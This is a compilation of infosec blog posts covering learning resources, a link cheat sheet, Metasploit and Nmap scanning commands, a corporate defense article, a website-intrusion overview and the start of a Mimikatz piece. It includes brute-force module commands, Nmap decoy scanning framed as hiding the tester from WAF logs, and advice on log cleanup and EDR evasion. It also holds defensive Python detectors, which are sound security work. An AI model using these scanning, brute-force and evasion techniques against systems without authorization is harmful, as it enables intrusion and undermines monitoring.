  • Virtual Machines dominate this category as they allow you to practice against real machines. Head to vulnhub and download any VM that looks interesting (link)
  • Metasploit Unleashed – A solid run through of the metasploit testing framework to be used in conjunction against VM’s. (link)
  • The Basics of Hacking and Penetration Testing – A very basic look at penetration testing useful for those completely new to the field. (link)
  • Metasploit – The Penetration Testers Guide – Another book focusing around the use of metasploit in penetration testing (link)
  • Because this is such a huge field it often helps to break it down into one aspect, then research that aspect specifically. Blogs are your best friend here. (link)

 

Exploit Development

  • Corelan – This is by far the best resource out there for learning about exploit development. (link)
  • FuzzySecurity – Another good learning resource with some tutorials available (link)
  • Exploit-DB – One of the best things you can do is find examples of exploits (often with apps attached) and try and replicate the exploit independently (link)
  • Hacking – The Art of Exploitation – A fantastic book that covers tons of different exploitation techniques (link)
  • The Shellcoders Handbook – Another fantastic book on exploit development and shellcoding (link)

Other than that, Google, Google, and some more Google. I’ve left off some area’s such as forensics and compliance because personally I’m not interested in them so I haven’t gone looking for resources, I’m sure there are some fantastic ones out there.

Formal Learning
Outside of the free resources you can also begin to get certifications to make yourself more appealing to employers if you wish to move into the field as a career path. One certification I’d highly recommend is the “Penetration Testing with Kali Linux” course from Offensive Security (link) if you’re interested in network security. It’s easily one of the best learning experiences I’ve ever had in the field and taught me more in 60 days than I’d learnt in a year on my own. Their “Cracking the Perimeter” is also a great course, focusing a little more on exploit development (link).

If you’re looking at developing your programming skills, things like SecurityTube’s “Python for Pentesters and Hackers” (link) are a great foundation that will teach you how to do plenty of nifty things like building your own port scanners, password crackers etc. I don’t place a huge value on the certifications they offer from an employment perspective, but I’d look at it more as a consolidated lump of knowledge and examples for sale, which can still be valuable.

The “Certified Ethical Hacker” course is another commonly mentioned one. Honestly it’s typically looked down upon so I don’t think it’s necessarily worth the money – but if you need a formal course to learn things then it might be worth it to you. A lot of these certifications and their value are discussed over at TheEthicalHacker.net’s forums located here.

“Just seeing if you can”
Hacking is all about gaining access to things we’re not meant to. Creating an exploit, finding a SQL injection, cracking passwords: it’s all designed to move us towards the goal of taking control of the box we’re attacking. I guarantee almost every new hacker has started dreaming about “just seeing if they can” get access to that school website, “just seeing if they can” gain access to the neighbour's WiFi network, or sending their friend a trojan “just to see if they can” take control. Worse still, you might end up visiting places like HackForums.net and seeing a lot of people trying to infect others with RATs, build botnets etc. under the impression this is hacking, or sadly that this is the only way you can learn.

I need to emphasize that this is not the case. Any type of “just seeing if you can” type exercises can be replicated through the use of virtual machines, your own routers or even capture the flag / wargame competitions out there. Being realistic even if you can access another person’s machine, what are you going to do with it? Are you really going to try and steal credit card details and make fraudulent transactions? Are you really going to steal passwords and be paranoid that your activity is going to be traced back to you for the sake of peeking at someone’s emails? There have been plenty of examples of newbies being charged, not realizing the seriousness of the crimes they are committing. If you went for a job with the FBI and they had a look through your post history would you like them to read that post about you asking how to host a botnet? It’s a classic example of what’s on the internet is forever, and if you really want a career in information security you need that clean record to obtain any security clearances you’re going to need to do your job. Getting caught for stupid stuff just isn’t worth it.

Summary
So after a long ramble, what’s the key points?

  • A hacker will actively seek out information, not wait for others to give it to them
  • The difference between a script kiddie and a new hacker is the desire to learn
  • You need to experiment with a wide range of information security fields to find what interests you
  • Don’t let anyone tell you that there are prerequisites for learning information security; there aren’t.
  • It’s not worth “just seeing if you can” do anything that isn’t legal, the risk vs reward makes no sense for doing so
  • With courses, wargames, capture the flags and more importantly virtual machines there is no hacking scenario that can’t be replicated legally

Have fun, sorry if it got preachy towards the end and enjoy pwning boxes! Information security is an awesome field and you’ll be learning something new every day that you’re involved in it. There is no right answer for getting into the field apart from jumping into it with both feet. Get wet, learn to tread water and stay afloat, one day you might even be able to swim a little!

Find me on twitter @jimmwayans

Information/Cyber Security Cheat Sheet

This is a recollection of links and resources I have found / been told about over the years. I developed this post in the hope to map out good resources in the industry, facilitating the spread of knowledge, no matter the skill level.

If any errors are spotted, or any links need adding / updating / removing. Please contact me via Twitter @jimmwayans (https://twitter.com/jimmwayans).

CTF Site Links

The King Of CTF Pages – https://ctftime.org/
247CTF – https://247ctf.com
HackTheBox – https://hackthebox.eu/
RootMe – https://root-me.org/
0x0539 – https://0x0539.net/
Laptop Hacking Coffee – https://ctf.laptophackingcoffee.org/
pwnable tw – http://pwnable.tw/ (Only BinExp)
pwnable kr – http://pwnable.kr/ (Only BinExp)
PicoCTF – https://picoctf.com/ (Beginner friendly)
reversing kr – http://reversing.kr/
The Stereotyped Challenges – https://chall.stypr.com/
SDSLabs CTF – https://backdoor.sdslabs.co/

Payload Cheat Sheets

PayloadsAllTheThings – https://github.com/swisskyrepo/PayloadsAllTheThings
BurpSuite XSS Cheat Sheet – https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

OSCP Preparation

Sam’s Review / Guide – https://coffeejunkie.me/OSCP-Exam-Overview/
R4J Buffer Overflow – https://github.com/r4j0x00/oscp-like-stack-buffer-overflow
Computerphile BoF Explanation – https://www.youtube.com/watch?v=1S0aBV-Waeo
g0tm1lk Linux Priv Esc Cheat Sheet – https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Windows Priv Esc – https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
Windows Priv Esc (built around OSCP) – https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html

SAST Practice Pages

Secure Code Warrior – https://securecodewarrior.com/
ExploitDB (May require imagination) – https://www.exploit-db.com/

All Around Practical Learning (non-competitive)

OWASP Juice Shop – https://owasp.org/www-project-juice-shop/
Pentester Labs – https://pentesterlab.com/
OverTheWire – https://overthewire.org/ (Beginner friendly)
Pentester Academy – https://www.pentesteracademy.com/
PortSwigger Labs – https://portswigger.net/web-security
CTFLearn – http://ctflearn.com/
VulnHub – http://vulnhub.com/
Hacker101 – https://www.hacker101.com/
OSINTme – https://osintme.com/

All Around Theory Learning (non-competitive)

OWASP – https://owasp.org/
BurpSuite Research – https://portswigger.net/research
HumbleBundle Cyber Security Books – https://www.humblebundle.com/books/cybersecurity-2020-wiley-books?hmb_source=navbar&hmb_medium=product_tile&hmb_campaign=tile_index_4
Free SANS courses for the fundamentals – https://www.cyberaces.org/courses.html

Relevant Blogs / Podcasts

Security Weekly – https://securityweekly.com/category-shows/application-security-weekly/
Darknet Diaries – https://darknetdiaries.com/
TheManyHatsClub – https://themanyhats.club/
0x00Sec (Community Blog) – https://0x00sec.org/
Secret Club – https://secret.club/
g0tm1lk – https://blog.g0tmi1k.com/
Cybering – https://cybering.cc/

Twitch Hacking Channels (English)

TheBlindHacker – https://www.twitch.tv/theblindhacker
GeoHotz – https://www.twitch.tv/georgehotz
LiveOverflow – https://www.twitch.tv/LiveOverflow

Twitch Hacking Channels (Spanish)

S4vitar – https://www.twitch.tv/s4vitaar

Youtube Channels Pentesting (English)

HackerSploit – https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q
IppSec – https://youtube.com/ippsec
TheCyberMentor – https://www.youtube.com/channel/UC0ArlFuFYMpEewyRBzdLHiw
LiveOverflow – https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w
Computerphile – https://www.youtube.com/user/Computerphile

Relevant Discord Servers and Communities

TheManyHatsClub – https://discord.gg/infosec
ThugCrowd – https://thugcrowd.com/
LaptopHackingCoffee – https://laptophackingcoffee.org/doku.php?id=start
HackTheBox – https://discord.gg/hRXnCFA
0x00Sec – https://discord.gg/PHM9Wak (https://0x00sec.org)
John Hammond Discord – https://discord.gg/Kgtnfw4
ReSwitched – https://discordapp.com/invite/ZdqEhed
ur-hackr – https://ur-hackr.com/

Companies Offering Certificates

ELearnSecurity – https://elearnsecurity.com/
Pentester Academy – https://www.pentesteracademy.com/
Offensive Security – https://www.offensive-security.com/
HackTheBox – https://hackthebox.eu/

The Cybrary – https://www.cybrary.it/
CyberFirst – https://www.ncsc.gov.uk/cyberfirst/
Mind Map Everything – https://www.amanhardikar.com/mindmaps.html
Events around London – https://medium.com/@securestep9/cybersecurity-infosec-appsec-meetups-events-in-london-3688c4a42ea6
Razvi’s List of Hacking Sites – https://razvioverflow.github.io/starthacking
Peerlyst – https://www.peerlyst.com/
CTFs for beginners – https://twitter.com/JenF3rr_/status/1208577793359003648
HackerOne Bugbounty page – https://hackerone.com/
Using Twitter for InfoSec – https://dev.to/vickilanger/that-s-it-that-s-the-tweet-send-3e0h
CVE feed from the mitre – https://cve.mitre.org/

Active Information Gathering with Metasploit-Framework

Using Nmap to perform port scanning

-sT is the TCP connect scan, and it is what Nmap falls back to when run without raw-socket privileges (as root, the default is -sS). It judges the state of each port by completing the full TCP three-way handshake. Because the connection is fully established, the listening service sees it, so connect scans show up readily in host, firewall and application logs.

msf> nmap -sT 127.0.0.1 

-sS is the SYN scan: it sends a SYN and classifies the port from the SYN/ACK or RST that comes back, never completing the handshake, hence "half-open" or "stealth" scan. It is faster than a connect scan and never reaches the application, so it is less likely to appear in service logs, although an IDS watching the wire still sees every SYN. It requires raw-socket privileges (root).

msf> nmap -sS 127.0.0.1

-sU is the UDP scan. It is not the fastest of the three; in practice it is usually the slowest. UDP has no handshake, so a port that sends no reply cannot be distinguished from one whose reply was filtered (Nmap reports open|filtered), and most hosts rate-limit the ICMP port-unreachable messages that mark a port closed, which forces Nmap to slow down. Expect its results to be less definitive than the two TCP scans above.

msf> nmap -sU 127.0.0.1
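To see why a connect scan is so easy for the target to notice, here is a minimal TCP connect scan (the same idea as -sT) run against a throw-away listener on 127.0.0.1. This is an added example, not nmap's code; the listener, the ports and the loopback host are all constructed so it runs offline. The handshake completes for every open port probed, so the service's accept() fires and it can log the peer; a SYN scan (-sS) sends only the first packet and never reaches accept().

```python
"""Minimal TCP connect scan against a local listener, showing that the
service sees (and can log) every open-port probe. Constructed example."""
import socket
import threading
import time


def start_listener(accepted):
    """Listen on an ephemeral loopback port; append each accepted peer to `accepted`."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, peer = srv.accept()
            except OSError:          # listener closed; stop serving
                return
            accepted.append(peer)    # the service-level "log line" an admin would see
            conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv, port


def pick_closed_port():
    """Bind and release an ephemeral port so the scan has a known-closed target."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


def connect_scan(host, ports, timeout=1.0):
    """Full three-way handshake per port, classified the way nmap -sT reports it."""
    results = {}
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            results[port] = "open"           # SYN/ACK, handshake completed
        except ConnectionRefusedError:
            results[port] = "closed"         # RST came back
        except (socket.timeout, OSError):
            results[port] = "filtered"       # no answer: something dropped the SYN
        finally:
            s.close()
    return results


def demo():
    """Scan one open and one closed loopback port.
    Returns (results, number of accept() calls the listener saw, open_port, closed_port)."""
    accepted = []
    srv, open_port = start_listener(accepted)
    closed_port = pick_closed_port()
    results = connect_scan("127.0.0.1", [open_port, closed_port])
    time.sleep(0.2)                           # let the accept thread record the peer
    srv.close()
    return results, len(accepted), open_port, closed_port
```

Running demo() reports the listener's port as open, the released port as closed, and exactly one accepted connection on the listener: that accepted connection is the footprint the text warns about.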

Operating system identification.
Nmap offers two related fingerprinting options, which are often confused:

1. -O is active operating system detection. It needs raw-packet privileges (root), works best when the target has at least one open and one closed TCP port, and can be combined with any of the port scan types above.

msf> nmap -O 127.0.0.1

2. -sV is service and version detection. It is normally combined with one of the port scan types above, and Nmap appends the detected service name, product and version to each open port in the results. Note that this identifies what is listening on each port, not the operating system; for that you still need -O.

msf> nmap -sSV 127.0.0.1

Nmap security scan

Usually, a scan launched against the target site or host will be recorded by the WAF or IDS, which is extremely unsafe for the tester, so hiding the tester's real IP behind intrusive, deceptive scans is necessary. Nmap provides the advanced -D parameter for this: if you supply 2 decoy IP addresses, Nmap will leave 3 IP addresses in the WAF log to confuse the audience and protect the tester as much as possible.

msf> nmap -sS 127.0.0.1 -D 10.10.20.100,10.10.20.101 
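As an added defensive example (not from the original post, and not part of Nmap or Metasploit), the following Python reads constructed firewall connection-log lines and flags the scan shapes described above: a half-open (-sS) sweep shows many SYNs with no completed handshake, a connect (-sT) sweep shows completed handshakes, and a -D decoy scan shows several sources probing the identical port set at the same moment. The log layout, addresses and thresholds are all assumptions for the demo.

```python
"""Port-sweep and Nmap -D decoy detection over firewall connection logs.

Added example for this page; not part of the original post, Nmap or
Metasploit. Constructed one-line log layout:
<utc-timestamp> src=<ip> dst=<ip> dport=<port> proto=tcp handshake=<0|1>
handshake=0: only a SYN was seen (half-open, as with -sS); 1: completed.
"""
import re
from collections import defaultdict
from datetime import datetime

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+) "
    r"proto=tcp handshake=(?P<hs>[01])$"
)
SCAN_PORTS = [21, 22, 23, 25, 80, 110, 139, 443, 445, 3389]


def build_sample_log():
    """Constructed sample: 10.10.20.5 runs a SYN sweep with the two decoy
    addresses from the command above, then a normal client uses port 443."""
    lines = []
    for src in ("10.10.20.5", "10.10.20.100", "10.10.20.101"):
        for sec, port in enumerate(SCAN_PORTS):
            lines.append(f"2024-03-01T10:00:0{sec}Z src={src} dst=192.0.2.10 "
                         f"dport={port} proto=tcp handshake=0")
    lines.append("2024-03-01T10:05:12Z src=10.10.30.7 dst=192.0.2.10 "
                 "dport=443 proto=tcp handshake=1")
    lines.append("2024-03-01T10:05:20Z src=10.10.30.7 dst=192.0.2.10 "
                 "dport=443 proto=tcp handshake=1")
    return lines


def parse_line(line):
    """Return a record dict, or None for lines that do not match the layout."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {"ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
            "src": m["src"], "dst": m["dst"], "dport": int(m["dport"]),
            "handshake": m["hs"] == "1"}


def detect_scans(lines, port_threshold=10, window_seconds=60):
    """Map each scanning source to its first qualifying window: kind
    (syn_scan or connect_scan), targets, port set and first-seen time."""
    by_src = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_src[rec["src"]].append(rec)
    findings = {}
    for src, recs in by_src.items():
        recs.sort(key=lambda r: r["ts"])
        start = 0
        for end in range(len(recs)):
            # slide the window start forward until the span fits window_seconds
            while (recs[end]["ts"] - recs[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            win = recs[start:end + 1]
            ports = {r["dport"] for r in win}
            if len(ports) < port_threshold:
                continue
            half_open = sum(1 for r in win if not r["handshake"])
            findings[src] = {
                "kind": "syn_scan" if half_open * 2 > len(win) else "connect_scan",
                "targets": frozenset(r["dst"] for r in win),
                "ports": frozenset(ports),
                "first_seen": win[0]["ts"],
            }
            break
    return findings


def find_decoy_clusters(findings, max_skew_seconds=5):
    """Group scanners hitting the same targets and port set within a few
    seconds of each other: the signature of one -D scan. Only one member is
    the real scanner and the log alone cannot say which, so treat the
    cluster as a single event rather than blocking every address in it."""
    groups = defaultdict(list)
    for src, f in findings.items():
        groups[(f["targets"], f["ports"], f["kind"])].append((f["first_seen"], src))
    clusters = []
    for members in groups.values():
        members.sort()
        cluster = [members[0][1]]
        for prev, cur in zip(members, members[1:]):
            if (cur[0] - prev[0]).total_seconds() <= max_skew_seconds:
                cluster.append(cur[1])
            else:
                if len(cluster) > 1:
                    clusters.append(sorted(cluster))
                cluster = [cur[1]]
        if len(cluster) > 1:
            clusters.append(sorted(cluster))
    return clusters


if __name__ == "__main__":
    found = detect_scans(build_sample_log())
    for src, f in sorted(found.items()):
        print(f"{src}: {f['kind']} of {len(f['ports'])} ports on {sorted(f['targets'])}")
    print("probable -D decoy clusters:", find_decoy_clusters(found))
```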

1. TCP port scan

msf> use auxiliary/scanner/portscan/tcp 

2. SYN port scan

msf> use auxiliary/scanner/portscan/syn

3. Call nmap

In metasploit-framework, use db_nmap to do a complete banner grab with the following command:

msf> db_nmap -Pn -sTV -T4 --open --min-parallelism 64 --version-all 127.0.0.1 -p-

The -Pn parameter tells Nmap that the target has already been determined to be online, so no further host discovery is required and that step is skipped. -sTV means a TCP connect scan that also determines the banner information and version of each port. -T4 uses aggressive timing, --open shows only open ports, --min-parallelism 64 forces a minimum of 64 probes in parallel, --version-all makes Nmap use all of its probes to identify service details, and -p- (the -p parameter set to -) scans all ports on the target.

4. Use ARP for live host scanning

msf> use auxiliary/scanner/discovery/arp_sweep
msf> set RHOSTS
msf> set THREADS 10
msf> run

5. Use UDP to detect live hosts

msf> use auxiliary/scanner/discovery/udp_sweep
msf> set RHOSTS
msf> set THREADS 10
msf> run

6. Use SMB to detect live hosts

msf> use auxiliary/scanner/smb/smb_enumshares
msf> set RHOSTS
msf> set THREADS 10
msf> run

7. SMB version scan

msf> use auxiliary/scanner/smb/smb_version 

8. SMB brute force (dictionary required)

msf> use auxiliary/scanner/smb/smb_login

9. SSH version scan

msf> use auxiliary/scanner/ssh/ssh_version

10. FTP version scan

msf> use auxiliary/scanner/ftp/ftp_version

11. SMTP enumeration

msf> use auxiliary/scanner/smtp/smtp_enum

12. SNMP enumeration

msf> use auxiliary/scanner/snmp/snmp_enum

13. SNMP login

msf> use auxiliary/scanner/snmp/snmp_login

14. WinRM scan

msf> use auxiliary/scanner/winrm/winrm_auth_methods

15. WinRM brute force cracking

msf> use auxiliary/scanner/winrm/winrm_cmd

Offensive and Defense Exercise Preparation | How to build an effective corporate security defense system

After the epidemic, work and life gradually returned to normal. For the network security industry, offensive and defensive drills are once again on the agenda. In the new year, how do companies prepare for defense? Let us find the answer from the review and reflection in 2019/20.

In 2019/20, offensive and defensive exercises once became a buzzword in the security circle, and such activities of all sizes continued. After the experience, many companies will re-examine their own security defense capabilities, and even the protection capabilities of their partners. The essence of offensive and defensive exercises is to verify the effectiveness of corporate security defense capabilities from the attacker’s perspective. Therefore, this article will introduce from the attacker’s perspective to provide some practical suggestions for companies facing offensive and defensive exercise needs or wishing to build an effective defense system.

Recurring attack chain

When it comes to attacks, we have to mention the "Cyber Kill Chain". Based on the attack methods that have appeared in actual offensive and defensive exercises in recent years, we have drawn the "attack chain" shown in the following figure:

Cyber Kill Chain

Attack chain in offensive and defensive exercises

Everything is difficult at the beginning. The first problem the attacker encounters after selecting a target is usually finding a point of entry. Most combine domain-name, IP and other asset scanning to reconnoitre and infiltrate the target's business systems, and at this stage the Web is still the main point of entry. Web vulnerabilities have emerged endlessly over the years: attackers use them to implant Webshell variants on web servers, then intrude further, gain server privileges, and keep collecting intranet information to expand their foothold. Many companies either lack Web defenses or have them bypassed: many web assets have never been properly discovered, or the WAF has been bypassed. How to formulate effective WAF rules at the earliest moment has therefore become the primary problem enterprises urgently need to solve, which is to block the attacker's entrance.

By discovering and exploiting vulnerabilities in border servers, attackers often gain the first entry point of the intrusion, such as a Webshell, and may even directly gain control of the server. Server control is the main battlefield of the offensive and defensive confrontation: the business, data and core assets of the enterprise all live on servers, and the attacker's goal is usually to obtain core asset data or control core business assets in order to penetrate further. On the compromised server the attacker uses a Webshell variant such as "ice scorpion", or even a Rootkit, to control the server further. After breaking into the internal network, they usually keep collecting data and information on the intranet and install multiple backdoors to secure further control. These backdoors often use DNS tunnel communication, C&C communication and the like to connect to the control end. High-level attackers often erase logs or even plant fake logs to confuse the defender.

The attack process is a dynamic process of continuous correction. A good attacker often combines the information he has obtained to continuously infiltrate and analyze the target.

The defender will become passive or even anxious in this offensive and defensive exercise. How to effectively detect the attacker and block them in time has become an urgent problem to be solved. Common protection methods include blocking the attacker’s IP, setting protection strategies, combining existing security product strategies with continuous analysis, and operating and revising existing protection strategies.

Constructing the defensive quadrant

Combining the attacker's attack chain with the urgency of demand, I constructed a set of defense quadrants based on offensive and defensive confrontation. The quadrants include not only products but also operations and services, in the hope of helping the defender quickly and effectively deploy a security system and achieve good protection.

Defensive quadrant

1. The defense quadrant

The defense quadrant is the most important quadrant. It contains the bottom-line products of enterprise protection, products whose main capability is preventing and blocking hacker attacks; in real-world offensive and defensive confrontation they can resist most attackers. Here we introduce WAF, FW and HIPS. A WAF can withstand most intrusions from the Web, especially a programmable WAF: when a new vulnerability appears during an offensive and defensive exercise, it can be blocked immediately by writing a script. The new generation of WAF also has semantic analysis technology, which can effectively reduce false alarms and improve the defender's ability to resist unknown threats. The firewall can effectively control assets at the border and detect and block malicious communication in the network. As for the assets on the server, which are the key targets of hacker attacks, a HIPS installed in the server operating system can immediately detect the characteristics of attacks such as Webshell, Rootkit and hacking actions (reverse shell, brute force cracking, privilege escalation, etc.) and perform interception and protection, raising the level of defense of core assets.

2. Detection quadrant

The detection quadrant focuses on the detection and trapping of hackers. Products in this quadrant can quickly detect intrusions, detect hacker attacks, and trap and profile the attackers; examples are HIDS, NTA and Honeypot. Here we focus on NTA and Honeypot. NTA products are called Network Traffic Analysis, but I prefer to understand them as Network Threat Analysis, that is, network threats are modeled and analyzed from traffic, perceived in real time and warned about early; compared with a traditional IPS, this type of product is more complete and comprehensive in traffic coverage and threat modeling. A honeypot is a very good tool for detecting hacker intrusions. In a real network environment the defender will not trigger the honeypot, and an attacker IP found through the honeypot can be linked directly to the firewall for blocking; its distinctive JSONP probe can profile the attacking hacker, so that the hacker's intrusion activity is grasped at the earliest moment. The profiling function plays a vital role in tracing the source of the attack.

3. Security Operations Quadrant

The security operations quadrant is a combined quadrant, a combination of the previous two. Here we recommend pairing products with the security analyst model. In the past few years penetration testing engineers have become very popular, driven by the many result-oriented projects that push corporate security construction forward. With the emergence of security vulnerabilities and the increase in the number of hacking incidents, security analysts will become more important in the future. They can analyze the effectiveness of the configuration strategies and deployment locations of the various security products the defender has deployed and adjust them to the best level, and they investigate and trace security incidents to help the enterprise solve the last mile of security. For product tooling, SOAR can be chosen for security orchestration and automated response: it combines the analysts' strategy orchestration with the APIs of the various systems to adjust protection and response strategies, achieving unified analysis, centralized display and rapid handling to close the security loop.

4. Threat Intelligence Quadrant

Intelligence work in the threat intelligence quadrant is divided into two categories. The first is the collection and analysis of real-time intelligence. During offensive and defensive exercises, especially large-scale ones, intelligence becomes extremely important. The defender should keep collecting attack intelligence, such as the attacking team's methods, the attacker's source IPs and common tools, and feed this intelligence promptly into the operation and maintenance of the defense quadrant's products. The second category is passive intelligence collection. Take scanner products as an example: the new generation of scanners can quickly analyze assets and detect vulnerabilities. Considering the attacker's methods, vulnerability detection here should be based on Web vulnerabilities while also covering system vulnerability scanning. Such a scanner can help security analysts detect assets quickly and in real time during the protection period, and actively or passively scan for vulnerabilities so that security issues are resolved as soon as possible.

Summary

The security products in the above four quadrants, combined with security analysis services, can quickly raise the defender's capabilities to a higher level in actual offensive and defensive exercises. The essence of offensive and defensive confrontation is to fully expose problems and verify the effectiveness of existing protection methods while continuously correcting the hidden problems that have been discovered. This will be a continuous process. The defender also needs to keep track of its own asset changes, vulnerability updates, threat intelligence and other information, and use them together to achieve a sufficient defensive effect.

It is hoped that each defender can quickly and reasonably complement the shortcomings in the offensive and defensive exercises according to their actual conditions, combined with effective security analysis and operational strategies, to detect and block more attackers as soon as possible from their own defense gates.

How Do Hackers Break Into Websites?

As a company’s operation and maintenance personnel, especially for large and medium-sized enterprises, it is not uncommon for websites and web applications to be attacked by hackers.

Web apps and websites can be divided into three categories: individual operations, team/company operations, and government operations.

The proportion of personal websites is still very large, and most of these websites use open source CMSs.

Such as blogs: WordPress, Joomla, Typecho, Z-blog and more;

Community categories: Discuz, PHPwind, StartBBS, Mybb, etc.

Team/company websites also make heavy use of common open source CMSs, and government websites are mostly outsourced for development.

If it is broader, it can be divided into two major parts: open source and closed source.

What effectively exposes the pseudo-security of a website is proving, from a hands-on perspective, whether it is really solid.

The reason I talk about intrusion methods here is not to teach you how to break into websites, but to help you understand the various methods of intrusion. Only by knowing how attacks happen can you learn how to protect against them.

A kitchen knife can be used to cut vegetables, and it can also be used to kill people.

Let’s talk about some common procedures for hackers to invade websites.

The common process for hackers to attack and hack websites

1. Information Gathering

1.1 Whois information – registrant, phone, email, DNS, address

1.2 Google hack – sensitive directories, sensitive files, more information collection

1.3 Server IP – Nmap scan, port corresponding service, C segment

1.4 Side note – Bing query

1.5 If you encounter a CDN – Cloudflare (bypass), start with subdomains (mail, postfix), DNS zone transfer vulnerabilities

1.6 Server, components (fingerprint) – operating system, web server (apache, nginx, iis), scripting language

Through the information gathering process, the attacker has basically been able to obtain most of the information about the website. Of course, information gathering is the first step of the website invasion and determines the success of the subsequent attack.

2. Vulnerability Scanning 

2.1 Scan the website/web application for vulnerabilities – (tools: acunetix, burpsuite, dirsearch, nikto etc)

2.2 XSS, CSRF, XSIO, SQL injection, permission bypass, arbitrary file reading, file inclusion…

2.3 Test for upload vulnerabilities – truncation, modification, parsing vulnerabilities

2.4 Is there a verification code (2fa)? – brute force attempt

By now, the attacker has a lot of information about your website and may have found vulnerabilities affecting your website. In the next step, they will begin to use those vulnerabilities to gain access to your website.

3. Vulnerability Exploitation

3.1 Thinking about the purpose – what kind of effect is achieved. (Exploit any found vulnerabilities)

3.2 Hidden, destructive – Find the corresponding EXP attack payload based on the detected application fingerprint or write it yourself

3.3 Start the vulnerability exploit, obtain the corresponding permissions, and get a webshell on the server, according to different scenarios

4. Privilege Escalation

4.1 Choose different attack payloads for privilege escalation according to the server type (Use Metasploit where possible)

4.2 If privilege escalation is not possible, start password guessing based on the information obtained, and go back to information gathering

5. Implant a Backdoor

5.1 Concealment

5.2 Check and update regularly to maintain persistence

6. Log cleanup (Clear your tracks)

6.1 Camouflage and concealment: to avoid raising alarms, they usually choose to delete specific logs

6.2 Locate the corresponding log files according to the time period...

Having said so much, how many of these steps do you understand? Read more and research online.

Of course, the type of attack may largely depend on the motivation the hacker has.

Although this takes a relatively long time, the general idea is like this.

After talking about the intrusion process, let's talk about why enterprise websites need to be secured.

First: Cybersecurity law regulations

The proposed cybersecurity law clearly sets out provisions for critical information infrastructure operators (for example, such operators should themselves, or by entrusting a network security service organization, conduct an inspection and assessment of their network security and possible risks at least once a year, and report the results and improvement measures to the relevant department responsible for the security protection of critical information infrastructure), and these provisions are quite mandatory: the legal liability section clearly states that if these regulations are not fulfilled, the relevant competent department shall order rectification and give warnings.

Regarding the interpretation of the Cyber Security Law, you can click here to view it.

It is worth noting that penetration testing is a commonly used and very important method in information security risk assessment and web security.

Second: Penetration testing helps PCI DSS compliance construction

In PCI DSS (Payment Card Industry Security Standards Council) Section 11.3, there is such a requirement: at least once a year, or after any major upgrade or modification to the infrastructure or applications (such as an operating system upgrade, or adding a web server or a sub-network to the environment), internal and external penetration testing needs to be performed.

Third: Baseline requirements for ISO27001 certification

ISO27001 Annex "A12 Information System Development, Acquisition and Maintenance" requires establishing a software security development lifecycle, and specifically proposes that additional penetration tests be conducted, with reference to, for example, OWASP standards, before going live.

Fourth: Requirements in the CBK’s multiple regulatory guidelines

According to the clear requirements in the multiple regulatory guidelines issued by the Central Bank of Kenya, a bank's security strategy, internal control system, risk management, system security and other aspects need to undergo penetration testing as well as inspection and evaluation of control capabilities.

Fifth: Minimize business losses

In addition to meeting policy compliance requirements, improving customers' operational security, or meeting the requirements of business partners, the ultimate goal should be to minimize business risk.

Companies need to conduct as many penetration tests as possible to keep security risks under control.

In the process of website development, many hidden security problems that are difficult to control and discover will occur. When these large numbers of flaws are exposed to the external network environment, information security threats are generated.

Companies can effectively prevent this problem through regular penetration testing, so that flaws are detected and resolved early. The system becomes more stable and secure after being tested and strengthened by cybersecurity professionals. The test report can help managers make better project decisions, prove the necessity of increasing the security budget, and convey security issues to senior management.

The difference between penetration testing and security testing

Penetration testing is different from traditional security scanning. In the overall risk assessment framework, the relationship between penetration testing and security scanning can be described as a continuation: as mentioned above, penetration testing verifies and supplements the scanning results.

In addition, the biggest difference between penetration testing and traditional security scanning is that penetration testing requires a lot of manual intervention.

These tasks are mainly initiated by cybersecurity professionals. On the one hand, they use their professional knowledge to conduct in-depth analysis and judgment on the scan results.

On the other hand, based on their experience, they manually check and test for the hidden security issues that the scanner cannot find, so as to perform more accurate verification (or simulated intrusion).

In case you need security services such as penetration testing, drop me a line on Twitter @jimmwayans and I'll be glad to work with you.

Mimikatz Exploration – WDigest

Mimikatz, to this day, remains the tool of choice when it comes to extracting credentials from lsass on Windows operating systems. Of course this is due to the fact that with each new security control introduced by Microsoft, GentilKiwi always has a way out. If you have ever looked at the effort that goes into Mimikatz, this is no easy task, with all versions of Windows x86 and x64 supported. And of course with the success of Mimikatz over the years, BlueTeam are now very adept at detecting its use in its many forms. Essentially, execute Mimikatz on a host, and if the environment has any maturity at all you’re likely to be flagged. Almost all modern EDRs will detect Mimikatz very fast.

It's always very important to understand your tools beyond just executing a script and running automated commands. With security vendors reducing and monitoring the attack surface of common tricks often faster than we can discover fresh methods, knowing how a particular technique works down to the API calls can offer a lot of benefits when avoiding detection in well protected environments.

That being said, Mimikatz is a tool that is carried along with most post-exploitation toolkits in one form or another. And while some security vendors are monitoring for process interaction with lsass, many more have settled on attempting to identify Mimikatz itself.
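As an added example of the lsass-access monitoring just mentioned (not from the original post, and not Sysmon's or any vendor's code), here is a small triage rule over constructed Sysmon Event ID 10 (ProcessAccess) records: it flags handles to lsass.exe that carry memory-read rights, skips a short allowlist, and raises severity when the call stack has unbacked frames or the source image lives outside the Windows directory. The field names are real Event ID 10 fields; the one-line layout, paths, access masks and addresses are assumptions for the demo.

```python
"""Triage Sysmon Event ID 10 (ProcessAccess) records for handles to lsass.exe.

Added example for this page, not part of the original post or of Sysmon.
SourceImage, TargetImage, GrantedAccess and CallTrace are real Event ID 10
fields; the 'Key=value Key=value' line layout and every path, mask and
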